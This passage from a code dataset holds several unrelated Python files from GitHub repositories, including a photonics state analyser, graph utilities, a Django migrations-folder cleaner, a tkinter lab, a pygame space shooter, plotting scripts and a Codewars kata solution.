BasicStates\"\n assert input_state.m == simulator.m, \"incorrect BasicState\"\n if output_states is None:\n self.output_states_list = self.input_states_list\n elif output_states == \"*\":\n outs = set()\n self.output_states_list = []\n explored_n = set()\n for input_state in self.input_states_list:\n if input_state.n in explored_n:\n continue\n explored_n.add(input_state.n)\n for output_state in simulator.allstate_iterator(input_state):\n if post_select_fn is None or post_select_fn(output_state):\n if output_state not in outs:\n outs.add(output_state)\n self.output_states_list.append(copy.copy(output_state))\n elif isinstance(output_states, dict):\n self.output_states_list = []\n for k, v in output_states.items():\n self._mapping[k] = v\n self.output_states_list.append(k)\n else:\n self.output_states_list = output_states\n self._post_select_fn = post_select_fn\n self.performance = None\n self.error_rate = None\n self._distribution = None\n\n def compute(self, normalize=False, expected=None):\n \"\"\"\n Go through the input states, generate (post-selected) output states and calculate if provided\n distance with expected\n \"\"\"\n self._distribution = np.zeros((len(self.input_states_list), len(self.output_states_list)))\n if expected is not None:\n self._expected_distribution = np.zeros((len(self.input_states_list), len(self.output_states_list)))\n self.performance = 1\n self.error_rate = 0\n for iidx, istate in enumerate(self.input_states_list):\n sump = 1e-6\n if expected is not None:\n if istate in expected:\n expected_o = expected[istate]\n elif istate in self._mapping and self._mapping[istate] in expected:\n expected_o = expected[self._mapping[istate]]\n if not isinstance(expected_o, BasicState):\n for k, v in self._mapping.items():\n if v == expected_o:\n expected_o = k\n break\n self._expected_distribution[iidx, self.output_states_list.index(expected_o)] = 1\n for oidx, ostate in enumerate(self.output_states_list):\n if self._post_select_fn is None or self._post_select_fn(ostate):\n if istate.n == ostate.n:\n self._distribution[iidx, oidx] = self._simulator.prob(istate, ostate)\n if expected is not None and self._expected_distribution[iidx, oidx]:\n found_in_row = self._distribution[iidx, oidx]\n if self._distribution[iidx, oidx] < self.performance:\n self.performance = self._distribution[iidx, oidx]\n sump += self._distribution[iidx, oidx]\n if normalize or expected is not None:\n self._distribution[iidx, :] /= sump\n if expected is not None:\n self.error_rate += 1-found_in_row/sump\n if expected is not None:\n self.error_rate /= len(self.input_states_list)\n return self\n\n def pdisplay(self, output_format=\"text\", nsimplify=True, precision=1e-6):\n if self._distribution is None:\n self.compute()\n d = []\n for iidx, _ in enumerate(self.input_states_list):\n d.append([simple_float(f, nsimplify=nsimplify, precision=precision)[1]\n for f in list(self._distribution[iidx])])\n return tabulate(d, headers=[self._mapping.get(o, str(o)) for o in self.output_states_list],\n showindex=[self._mapping.get(i, str(i)) for i in self.input_states_list],\n tablefmt=output_format == \"text\" and \"pretty\" or output_format)\n\n @property\n def distribution(self):\n return self._distribution\n","repo_name":"Elian-OR/Perceval","sub_path":"perceval/components/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"70230648770","text":"import numpy as np\nfrom scipy import 
spatial\nimport networkx as nx\nimport os\nimport pickle\n\ndef process_title(title):\n return [w.replace('(', '').replace(')','').lower() for w in title.split('_')]\n\n'''\nData\n'''\n\ndata_path = 'data'\ndef load_graph():\n '''\n Loads the Wikipedia subgraph and the translation dictionaries.\n\n @Returns:\n graph... networkx graph\n idx2word... dictionary (key=index, value=word)\n word2idx... dictionary (key=word, value=idx)\n '''\n\n graph = nx.read_gpickle(os.path.join(data_path, 'wales', 'wiki_graph.p'))\n with open(os.path.join(data_path, 'wales', 'idx2name.p'), 'rb') as handle:\n idx2word = pickle.load(handle)\n with open(os.path.join(data_path, 'wales', 'name2idx.p'), 'rb') as handle:\n word2idx = pickle.load(handle) \n return graph, idx2word, word2idx\n\ndef load_challenges():\n '''\n Loads scraped Wikirace challenges.\n\n @Returns:\n challenges... list of word tuples\n '''\n\n challenges = []\n with open(os.path.join(data_path, 'wales', 'challenges.txt'), 'r') as inf:\n lines = inf.readlines()\n for line in lines:\n s, t = line.replace('\\n', '').split('\\t')\n challenges.append((s,t))\n return challenges\n\ndef load_embedding(emb_file):\n with open(os.path.join('data', 'embeddings', emb_file), 'rb') as handle:\n emb_dict = pickle.load(handle)\n return emb_dict\n\n'''\nDistance Functions\n'''\n\ndef cosine_dist(v1, v2):\n '''\n Cosine distance between two vectors.\n\n @Params:\n v1... vector 1\n v2... vector 2\n @Returns:\n 1-cossim\n '''\n\n d = spatial.distance.cosine(v1, v2)\n if np.isnan(d) or np.all(v1==0) or np.all(v2==0):\n return np.inf\n else:\n return d\n\ndef cosine_dist_parallel(V, v):\n '''\n Parallel cosine distance between batch of vectors and a vector.\n\n @Params:\n V... batch of vectors (n x d)\n v... vector (d)\n @Returns:\n 1-cossim between each vector in batch and v\n '''\n\n mask = np.sum((V!=0), axis=1)==0\n tmp = V@v\n tmp[mask] = np.inf\n tmp[~mask] = 1 - tmp[~mask]/(np.linalg.norm(V[~mask,:], axis=1) * np.linalg.norm(v))\n return tmp","repo_name":"kahlmeyer94/WALES","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21144859042","text":"import logging\nfrom random import choice\nfrom flask import Flask, request\n\nclass TransactionIDContextFilter(logging.Filter):\n \"\"\"\n This is a filter which injects contextual information into the log.\n\n Rather than use actual contextual information, we just use random\n data in this demo.\n \"\"\"\n\n USERS = ['jim', 'fred', 'sheila']\n IPS = ['123.231.231.123', '127.0.0.1', '192.168.0.1']\n\n def filter(self, record):\n\n record.ip = choice(TransactionIDContextFilter.IPS)\n record.user = choice(TransactionIDContextFilter.USERS)\n return True\n\nif __name__ == '__main__':\n levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL)\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)-15s %(name)-5s %(levelname)-8s IP: %(ip)-15s User: %(user)-8s %(message)s')\n a1 = logging.getLogger('a.b.c')\n\n a1.addFilter(TransactionIDContextFilter())\n a1.debug('A debug message')\n a1.info('An info message with %s', 'some parameters')\n","repo_name":"ibm-cloud-architecture/build-to-manage","sub_path":"DistributedTrace/python/service3/logtest.py","file_name":"logtest.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"43"} 
+{"seq_id":"41953848880","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nbase_dir = \"trajectories/\"\nif __name__==\"__main__\":\n\n\n plts = []\n legends = [\"Single-target Planner\",\"Multi-target Planner\"]\n line_style = [\"b\", \"r\",\"k\",\"m\",\"c\"]\n\n for index in range(0,5):\n pcrlb_file = base_dir + \"pcrlb_single_\" + str(index) + \".txt\"\n error_file = base_dir+\"average_error_\"+str(index)+\".txt\"\n pclb = []\n with open(pcrlb_file, \"r\") as f:\n for line in f:\n data = line.strip()\n pclb.append(float(data))\n\n if index==3 or index==4:\n plt1, = plt.plot(range(1, len(pclb) + 1), pclb, line_style[index-3], linewidth=2)\n plts.append(plt1)\n\n error = []\n with open(error_file, \"r\") as f:\n for line in f:\n data = line.strip()\n error.append(float(data))\n\n #plt2, = plt.plot(range(1, len(pclb) + 1), error, line_style[index-3+1], linewidth=2)\n #plts.append(plt2)\n\n\n\n plt.xlabel(\"Time Step\", size=15)\n plt.ylabel(r\"PCRLB ($m^2$)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends)\n plt.show()\n\n sys.exit(1)\n\n\n plts = []\n legends = [\"Target1\",\"Target2\",\"Target3\",\"Target4\"]\n line_style = [\"-b\",\"-r\",\"-k\",\"-c\"]\n\n for index in range(0,4):\n pcrlb_file = base_dir+ \"pcrlb_single_\"+str(index)+\".txt\"\n pclb = []\n with open(pcrlb_file,\"r\") as f:\n for line in f:\n data = line.strip()\n pclb.append(float(data))\n\n plt1, = plt.plot(range(1,len(pclb)+1), pclb, line_style[index], linewidth=2)\n plts.append(plt1)\n\n plt.xlabel(\"Time Step\", size=15)\n plt.ylabel(r\"Sample PCRLB ($m^2$)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends)\n plt.show()\n\n sys.exit(1)\n\n\n\n plts = []\n legends = [\"Target1\", \"Observer1\",\"Target2\", \"Observer2\",\"Target3\", \"Observer3\",\"Target4\", \"Observer4\",\"Multi-target Observer\"]\n line_style = [\"-b\",\"--b\",\"-r\",\"--r\",\"-k\",\"--k\",\"-c\",\"--c\",\"--m\"]\n\n indexes = [0,1,2,3,4]\n for idx,index in enumerate(indexes):\n truth_file = base_dir+ \"truth_\"+str(index)+\".txt\"\n sensor_file = base_dir+\"sensor_single_\"+str(index)+\".txt\"\n\n x_tuth = []; y_truth = []\n x_observer = []; y_observer = []\n if index<4:\n with open(truth_file,\"r\") as f:\n for line in f:\n data = line.strip().split(\"\\t\")\n x_tuth.append(float(data[0]))\n y_truth.append(float(data[1]))\n\n with open(sensor_file,\"r\") as f:\n for line in f:\n data = line.strip().split(\"\\t\")\n x_observer.append(float(data[0]))\n y_observer.append(float(data[1]))\n\n if index<4:\n plt1, = plt.plot(x_tuth,y_truth,line_style[2*idx],linewidth = 2)\n plt2, = plt.plot(x_observer,y_observer,line_style[2*idx+1],linewidth=2)\n plts.append(plt1)\n plts.append(plt2)\n else:\n plt2, = plt.plot(x_observer, y_observer, line_style[2*idx], linewidth=4)\n plts.append(plt2)\n\n plt.xlabel(\"X (m)\", size=15)\n plt.ylabel(\"Y (m)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends,loc=2)\n plt.show()\n\n\n","repo_name":"gorjida/MultiSensorMutiTargetRL","sub_path":"trajectory_generation_experiment_plots.py","file_name":"trajectory_generation_experiment_plots.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"5238851350","text":"import shutil\nimport os\n\n\nclass _ProjectManager:\n def __init__(self) -> None:\n self.success = False\n\n def get_user_choice(self):\n options = \"[1] Clear all migrations folders in this working directory\\n\" \\\n \"[2] Provide a path to clear migrations folders\\n\" \\\n\n 
print(\n \"----- Make sure you have a backup for your folders -----\")\n choice = input(\"Options:\\n\" + options + \"Enter your choice: \").strip()\n if choice.lower() == \"1\":\n cwd = os.getcwd()\n print(f\"[*] {cwd}\")\n return cwd\n elif choice.lower() == \"2\":\n folder_path = input(\"Provide the folder path: \").strip()\n if os.path.isdir(folder_path):\n if not self.is_dir_empty(folder_path):\n print(f\"[*] {folder_path}\")\n return folder_path\n else:\n print(\"The folder is empty.\")\n else:\n print(\"The path is not a folder.\")\n else:\n print(\"Exit.....\")\n os._exit(0)\n\n def confirm_deletions(self):\n \"\"\"\n Prompt the user for confirmation to delete a file or directory.\n\n Returns:\n bool: True if the user confirms, False otherwise.\n \"\"\"\n choice = input(\n \"Are you sure you want to continue with this path? (y/n): \").title()\n return choice.lower() == \"y\"\n\n def is_dir_empty(self, directory):\n \"\"\"\n Check if a directory is empty.\n\n Args:\n directory (str): The path to the directory.\n\n Returns:\n bool: True if the directory is empty, False otherwise.\n \"\"\"\n return not any(os.scandir(directory))\n\n def rest_migrations(self, cwd):\n \"\"\"\n Delete a file or an empty directory.\n\n Args:\n cwd (str): The current working directory.\n \"\"\"\n if os.path.isdir(cwd):\n for entry in os.scandir(cwd):\n if entry.name == \"migrations\" and entry.is_dir() and not self.is_dir_empty(entry.path):\n self.success = True\n parent_dir = os.path.basename(os.path.dirname(entry.path))\n print(f\"[*] {parent_dir} App:\")\n for subentry in os.scandir(entry.path):\n self.delete_entry(subentry)\n print(\"\")\n elif entry.is_dir():\n self.rest_migrations(entry.path)\n\n def delete_entry(self, entry, sub_tap=''):\n \"\"\"\n Delete a file or a directory (empty or non-empty), excluding folders containing __init__.py.\n\n Args:\n entry (os.DirEntry): The file or directory entry to delete.\n sub_tap (str): The indentation for printing.\n \"\"\"\n try:\n if entry.is_dir():\n if not self.is_dir_empty(entry.path):\n sub_tap = '\\t'\n has_init = False\n for subentry in os.scandir(entry.path):\n if subentry.name == \"__init__.py\" and subentry.is_file():\n has_init = True\n else:\n self.delete_entry(subentry, sub_tap)\n if has_init:\n print(\n f\"\\n\\t{sub_tap}[+] Can't be Deleted __init__.py --- {entry.path}\\n\")\n else:\n shutil.rmtree(entry.path)\n print(\n f\"\\t{sub_tap}Deleted Directory {entry.path}\")\n else:\n os.rmdir(entry.path)\n print(f\"\\t{sub_tap}Deleted Directory {entry.path}\")\n elif entry.is_file() and entry.name != \"__init__.py\":\n os.remove(entry.path)\n print(f\"\\t{sub_tap}Deleted File --- {entry.path}\")\n else:\n print(\n f\"\\n\\t{sub_tap}[+] Can't be Deleted __init__.py --- {entry.path}\\n\")\n except Exception as e:\n raise e\n","repo_name":"heXaCo0l/rest-migrations","sub_path":"rest_migrations/rm.py","file_name":"rm.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39944050470","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Lab 2\")\nroot.geometry('805x450+10+10')\nroot.config(bg='#84BF04')\n\ntex = Listbox(root, height=13, width=100)\ntex.grid(row=1, column=0)\n\nn = 0\nfor x in range(100):\n n = 10 ** x + n\n tex.insert(x, n)\n\n\nbutton_exit = Button(root, text=\"Exit\", width=8, pady=20, command=root.destroy)\nbutton_exit.grid(row=0, column=0)\nLabel(root, text=\"Scrollable\").grid(row=2, 
column=0)\n\nroot.mainloop()\n","repo_name":"DJA-prog/Tutorials-Python","sub_path":"HelpPy/LAB2_Ch10_gui.py","file_name":"LAB2_Ch10_gui.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7342307610","text":"import pygame, random\nfrom os import path\n\nimgDir = path.join(path.dirname(__file__), 'img')\nsndDir = path.join(path.dirname(__file__), 'snd')\n\nWIDTH = 640\nHEIGHT = 480\nFPS = 30\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Proper Game v2\")\nclock = pygame.time.Clock()\nfontName = pygame.font.match_font('arial')\n\nall_sprites = pygame.sprite.Group()\nmobs = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nboxes = pygame.sprite.Group()\n\n\nclass Ship(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(path.join(imgDir, \"ship3.png\"))\n # self.image.set_colorkey(SHIP)\n self.sndShoot = pygame.mixer.Sound(path.join(sndDir, 'laserShoot.wav'))\n self.sndShoot.set_volume(0.6)\n self.rect = self.image.get_rect()\n self.radius = 1\n pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.centerx = 50\n self.rect.bottom = HEIGHT / 2\n self.speedx = 0\n self.speedy = 0\n self.vel = 12\n self.fuel = 100\n self.lastUpdateTime = pygame.time.get_ticks()\n self.shootDelay = 250\n self.lastShot = pygame.time.get_ticks()\n\n def update(self):\n self.speedx = 0\n self.speedy = 0\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.speedx = self.vel\n\n if keys[pygame.K_LEFT]:\n self.speedx = -self.vel\n\n if keys[pygame.K_UP]:\n self.speedy = -self.vel\n\n if keys[pygame.K_DOWN]:\n self.speedy += self.vel\n\n if keys[pygame.K_SPACE]:\n self.shoot()\n\n self.rect.x += self.speedx\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n self.rect.y += self.speedy\n if self.rect.top < 0:\n self.rect.top = 0\n if self.rect.bottom > HEIGHT:\n self.rect.bottom = HEIGHT\n\n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n bullet = Bullet(self.rect.right, self.rect.centery + 7)\n all_sprites.add(bullet)\n bullets.add(bullet)\n self.sndShoot.play()\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.bulletImg = pygame.image.load(path.join(imgDir, \"fire15.png\")).convert()\n self.image = pygame.transform.scale(self.bulletImg, (15, 7))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = 20\n\n def update(self):\n self.rect.x += self.speedx\n if self.rect.left > WIDTH:\n self.kill()\n\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.meteorImgs = []\n self.meteorList = ['meteorBrown_big1.png', 'meteorBrown_big2.png', 'meteorBrown_big3.png',\n 'meteorBrown_med1.png', 'meteorBrown_med2.png', 'meteorBrown_small1.png',\n 'meteorBrown_small2.png', 'meteorBrown_tiny1.png']\n for met in self.meteorList:\n self.meteorImgs.append(pygame.image.load(path.join(imgDir, met)).convert())\n self.imageOrig = random.choice(self.meteorImgs)\n self.imageOrig.set_colorkey(BLACK)\n self.image = 
self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * .85 / 2)\n self.rect.x = random.randrange(WIDTH, WIDTH + 100)\n self.rect.y = random.randrange(0, HEIGHT - self.rect.height)\n self.speedx = random.randrange(1, 8)\n self.speedy = random.randrange(-3, 3)\n self.rot = 0\n self.rotSpeed = random.randrange(-8, 8)\n self.lastUpdateTime = pygame.time.get_ticks()\n\n def rotate(self):\n timeNow = pygame.time.get_ticks()\n if timeNow - self.lastUpdateTime > 50:\n self.lastUpdateTime = timeNow\n self.rot = self.rot + self.rotSpeed % 360\n newImage = self.image = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n\n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n self.rect.x -= self.speedx\n if self.rect.right < 0 or self.rect.bottom > HEIGHT + 10 or self.rect.top < 0:\n self.rect.x = random.randrange(WIDTH, WIDTH + 40)\n self.rect.y = random.randrange(0, HEIGHT - self.rect.height)\n self.speedx = random.randrange(1, 8)\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.explosionAnim = {}\n self.explosionAnim['lg'] = []\n self.explosionAnim['sm'] = []\n for i in range(9):\n filename = 'regularExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(imgDir, filename)) # .convert()\n imgLg = pygame.transform.scale(img, (75, 75))\n self.explosionAnim['lg'].append(imgLg)\n imgSm = pygame.transform.scale(img, (32, 32))\n self.explosionAnim['sm'].append(imgSm)\n self.size = size\n self.sndExplosion = pygame.mixer.Sound(path.join(sndDir, 'explosion.wav'))\n self.sndExplosion.set_volume(0.5)\n self.image = self.explosionAnim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameRate = 50\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameRate:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(self.explosionAnim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = self.explosionAnim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\nclass Space(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(path.join(imgDir, \"bg.gif\")).convert()\n self.rect = self.image.get_rect()\n self.dx = 5\n self.reset()\n\n def update(self):\n self.rect.right -= self.dx\n if self.rect.right <= 640:\n self.reset()\n\n def reset(self):\n self.rect.right = 1920\n\n\nclass Scoreboard(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.lives = 5\n self.level = 1\n self.score = 0\n self.text = \"\"\n self.image = \"\"\n self.rect = \"\"\n self.font = pygame.font.SysFont(\"None\", 50)\n\n def update(self):\n self.text = \"Ships: %d, Score: %d, Level: %d\" % (self.lives, self.score, self.level)\n self.image = self.font.render(self.text, 1, (255, 255, 0))\n self.rect = self.image.get_rect()\n\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((40, random.randrange(10, HEIGHT / 2)))\n self.image.fill(YELLOW)\n self.rect = self.image.get_rect()\n self.rect.left = WIDTH\n self.rect.bottom = 454\n self.speed_x = 0\n\n def update(self):\n self.speed_x = 0\n self.speed_x -= 10\n self.rect.x += 
self.speed_x\n if self.rect.right < 0:\n self.kill()\n\n\nclass Game(pygame.sprite.Sprite):\n def __init__(self, screen):\n pygame.sprite.Sprite.__init__(self)\n self.background = pygame.Surface(screen.get_size())\n self.background.fill((0, 0, 0))\n self.screen = screen\n self.screen.blit(self.background, (0, 0))\n self.player = Ship()\n self.space = Space()\n self.mob = Mob()\n self.scoreboard = Scoreboard()\n self.friendSprites = pygame.sprite.Group(self.space, self.player)\n self.scoreSprite = pygame.sprite.Group(self.scoreboard)\n\n def create_mob(self):\n self.mob = Mob()\n all_sprites.add(self.mob)\n mobs.add(self.mob)\n\n def draw_live_bar(self, surf, x, y, pct):\n if pct < 0:\n pct = 0\n bar_length = 400\n bar_height = 20\n fill = (pct / 100) * bar_length\n fill_rect = pygame.Rect(x, y, fill, bar_height)\n outline_rect = pygame.Rect(x, y, bar_length, bar_height)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n def drawText(self, surf, text, size, x, y):\n font = pygame.font.Font(fontName, size)\n textSurface = font.render(text, True, WHITE)\n textRect = textSurface.get_rect()\n textRect.midtop = (x, y)\n surf.blit(textSurface, textRect)\n\n def create_box(self):\n box = Box()\n if not boxes:\n boxes.add(box)\n all_sprites.add(box)\n else:\n box.rect.left = boxes.sprites()[-1].rect.right\n boxes.add(box)\n all_sprites.add(boxes)\n\n def instructions(self, score):\n ship = Ship()\n space = Space()\n all_sprites = pygame.sprite.Group(space, ship)\n insFont = pygame.font.SysFont(None, 50)\n insLabels = []\n instructions = (\n \"Mail Pilot. Last score: %d\" % score,\n \"Instructions: You are a mail pilot,\",\n \"delivering mail to the islands.\",\n \"\",\n \"Fly over an island to drop the mail,\",\n \"but be careful not to fly too close\",\n \"to the clouds. Your plane will fall \",\n \"apart if it is hit by lightning too\",\n \"many times. 
Steer with the mouse.\",\n \"\",\n \"good luck!\",\n \"\",\n \"click to start, escape to quit...\"\n )\n\n for line in instructions:\n tempLabel = insFont.render(line, 1, (255, 255, 0))\n insLabels.append(tempLabel)\n\n keepGoing = True\n pygame.mouse.set_visible(False)\n while keepGoing:\n clock.tick(30)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keepGoing = False\n donePlaying = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n keepGoing = False\n donePlaying = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n keepGoing = False\n donePlaying = True\n\n all_sprites.update()\n all_sprites.draw(screen)\n\n for i in range(len(insLabels)):\n screen.blit(insLabels[i], (50, 30 * i))\n\n pygame.display.flip()\n\n pygame.mouse.set_visible(False)\n return donePlaying\n\n def play(self):\n for i in range(8):\n self.create_mob()\n # pygame.mixer.music(path.join(sndDir, 'sndBackground.waw'))\n # pygame.mixer.music.set_volume(0.4)\n # pygame.mixer.music.play(loops=-1)\n time_start = pygame.time.get_ticks()\n running = True\n while running:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n time_now = pygame.time.get_ticks()\n if time_now - time_start > 120:\n self.create_box()\n time_start = time_now\n\n if time_now - self.player.lastUpdateTime > 300:\n self.player.fuel -= 1\n self.player.lastUpdateTime = time_now\n\n if self.player.fuel <= 0:\n running = False\n\n # check mob hit player\n hits = pygame.sprite.spritecollide(self.player, boxes, False, pygame.sprite.collide_circle)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'lg')\n exp.sndExplosion.play()\n all_sprites.add(exp)\n self.player.kill()\n self.scoreboard.lives -= 1\n if self.scoreboard.lives <= 0:\n running = False\n self.player = Ship()\n self.player.rect.y = 30\n all_sprites.add(self.player)\n\n # check bullet hit a mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'sm')\n exp.sndExplosion.play()\n self.scoreboard.score += 100 - hit.radius\n all_sprites.add(exp)\n self.create_mob()\n # check mob hit player\n hits = pygame.sprite.spritecollide(self.player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'lg')\n exp.sndExplosion.play()\n all_sprites.add(exp)\n self.scoreboard.lives -= 1\n if self.scoreboard.lives <= 0:\n running = False\n\n # Update\n all_sprites.update()\n self.friendSprites.update()\n self.scoreSprite.update()\n\n # Draw / Render\n self.friendSprites.draw(screen)\n self.scoreSprite.draw(screen)\n # screen.fill(BLACK)\n all_sprites.draw(screen)\n # drawText(screen, \"Score: \" + str(score), 18, HEIGHT / 2, 10)\n self.drawText(screen, \"FUEL\", 20, 95, 456)\n self.draw_live_bar(screen, 120, 456, self.player.fuel)\n # after drawing everything flip the display\n\n pygame.display.flip()\n return self.scoreboard.score\n\n\ndef main():\n done_playing = False\n score = 0\n game = Game(screen)\n while not done_playing:\n done_playing = game.instructions(score)\n if not done_playing:\n score = game.play()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dursuneryilmaz/Arcade-Game-Konami-Scramble","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40220259670","text":"import os\nimport json\nimport numpy as np\n\n\ndef 
write_preds_to_txt(path_to_pred_json_file, save_path):\n pred_json = json.load(open(path_to_pred_json_file, \"rb\"))[\"0\"]\n s = \"\"\n print(\"Writing results for {} sentences\".format(len(pred_json)))\n for i, sentence in enumerate(pred_json):\n s += \"====== Sentence {} ======\\n\".format(i)\n raw_sentence = sentence[\"raw_sentence\"]\n predictions = sentence[\"predictions\"]\n sentence_with_masks = sentence[\"sentence_with_masks\"]\n s += \"Sentence: {}\\nSentence with masks: {}\\n\\n\".format(raw_sentence, sentence_with_masks)\n for j, masked_question in enumerate(predictions):\n correct_token = masked_question[\"masked_word\"].replace(\"#\", \"\")\n s += \"## Mask {}\\nCorrect token: {}\\n\".format(j, correct_token)\n for model, value in masked_question[\"model_data\"].items():\n pred = value[\"top_n_preds\"][0].replace(\"#\", \"\")\n correct_rank = value[\"correct_rank\"]\n correct_prob = round(value[\"correct_prob\"],2)\n s += \"{}: {} correct_rank: {} correct_prob: {}\\n\".format(model, pred, correct_rank, correct_prob)\n s += \"\\n\"\n with open(save_path,\"w\") as o:\n o.write(s)\n\n\npath_to_pred_json_file = \"/Users/ardaakdemir/dprk_research/dprk-bert-data/error_analysis_results_2510.json\"\nsave_path =\"../dprk-bert-data/error-analysis-2610.txt\"\npred_json = json.load(open(path_to_pred_json_file, \"rb\"))\n# print(pred_json[\"0\"][0].keys())\nsentence = pred_json[\"0\"][0]\nprediction_example = sentence[\"predictions\"]\nprint(sentence[\"raw_sentence\"])\nprint(sentence[\"sentence_with_masks\"])\nprint(prediction_example)\n\nwrite_preds_to_txt(path_to_pred_json_file, save_path)","repo_name":"ardakdemir/DPRK-BERT","sub_path":"mlm_error_analysis.py","file_name":"mlm_error_analysis.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40355986314","text":"# Create a function that returns the name of the winner in a fight between two \n# fighters.\n#\n# Each fighter takes turns attacking the other and whoever kills the other \n# first is victorious. Death is defined as having health <= 0.\n#\n# Each fighter will be a Fighter object/instance. See the Fighter class below \n# in your chosen language.\n#\n# Both health and damagePerAttack (damage_per_attack for python) will be \n# integers larger than 0. You can mutate the Fighter objects.\n#\n# Your function also receives a third argument, a string, with the name of the \n# fighter that attacks first.\n# Example:\n#\n# declare_winner(Fighter(\"Lew\", 10, 2), Fighter(\"Harry\", 5, 4), \"Lew\") => \n# \"Lew\"\n# \n# Lew attacks Harry; Harry now has 3 health.\n# Harry attacks Lew; Lew now has 6 health.\n# Lew attacks Harry; Harry now has 1 health.\n# Harry attacks Lew; Lew now has 2 health.\n# Lew attacks Harry: Harry now has -1 health and is dead. 
Lew wins.\n#\n# class Fighter(object):\n# def __init__(self, name, health, damage_per_attack):\n# self.name = name\n# self.health = health\n# self.damage_per_attack = damage_per_attack\n# \n# def __str__(self): return \"Fighter({}, {}, {})\".format(self.name, self.\n# health, self.damage_per_attack)\n# __repr__=__str__\nfrom math import ceil\n\ndef declare_winner(fighter1, fighter2, first_attacker):\n # # Full simulation method\n # attacker = fighter1 if fighter1.name == first_attacker else fighter2\n # receiver = fighter2 if fighter1.name == first_attacker else fighter1\n # while True:\n # receiver.health -= attacker.damage_per_attack\n # if receiver.health <= 0:\n # return attacker.name\n # attacker, receiver = receiver, attacker\n round1 = ceil(fighter1.health / fighter2.damage_per_attack)\n round2 = ceil(fighter2.health / fighter1.damage_per_attack)\n if round1 == round2:\n return first_attacker\n elif round1 > round2:\n return fighter1.name\n else:\n return fighter2.name\n ","repo_name":"jeffwork2021/Codewars","sub_path":"Two fighters, one winner.py","file_name":"Two fighters, one winner.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} 